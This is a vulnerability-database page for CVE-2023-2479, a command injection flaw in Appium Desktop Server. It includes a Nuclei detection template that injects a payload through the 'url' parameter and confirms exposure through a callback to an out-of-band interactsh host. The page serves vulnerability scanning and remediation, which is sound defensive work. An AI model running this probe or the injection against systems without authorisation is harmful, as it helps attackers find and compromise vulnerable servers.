| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Exploit for Cross-site Scripting in Pressbooks | 25 Oct 202307:57 | – | githubexploit | |
| CVE-2023-2479 | 2 May 202318:30 | – | circl | |
| Appium Desktop 操作系统命令注入漏洞 | 2 May 202300:00 | – | cnnvd | |
| CVE-2023-2479 | 2 May 202300:00 | – | cve | |
| CVE-2023-2479 OS Command Injection in appium/appium-desktop | 2 May 202300:00 | – | cvelist | |
| Zero-Click Remote Code Execution | 23 Mar 202307:22 | – | huntr | |
| appium-desktop OS Command Injection vulnerability | 2 May 202315:30 | – | github | |
| CVE-2023-2479 | 2 May 202315:15 | – | nvd | |
| CVE-2023-2479 OS Command Injection in appium/appium-desktop | 2 May 202300:00 | – | osv | |
| GHSA-XQ6J-X8PQ-G3GR appium-desktop OS Command Injection vulnerability | 2 May 202315:30 | – | osv |
id: CVE-2023-2479
info:
name: Appium Desktop Server - Remote Code Execution
author: zn9988
severity: critical
description: |
OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
impact: |
Unauthenticated attackers can exploit OS command injection through the url parameter to execute arbitrary system commands and completely compromise Appium Desktop Server installations.
remediation: Fixed in v1.22.3-4
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-2479
- https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
- https://github.com/appium/appium-desktop/commit/12a988aa08b9822e97056a09486c9bebb3aad8fe
- https://github.com/Marco-zcl/POC
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-2479
cwe-id: CWE-78
epss-score: 0.22014
epss-percentile: 0.97365
cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: appium
product: appium-desktop
tags: cve2023,cve,huntr,appium,oast,rce,vuln
http:
- method: GET
path:
- '{{BaseURL}}/?url=<img/src="http://{{interactsh-url}}">'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource'
- type: word
part: header
words:
- 'application/json'
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: status
status:
- 404
# digest: 490a00463044022075feed2a4cbc3d1db1169c87010f8fd132f0897225fce5c9025436a22d57654e02203a85337933cce61fe437dc23574284f83145731f443f77f427b8f1a6fbca8b19:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation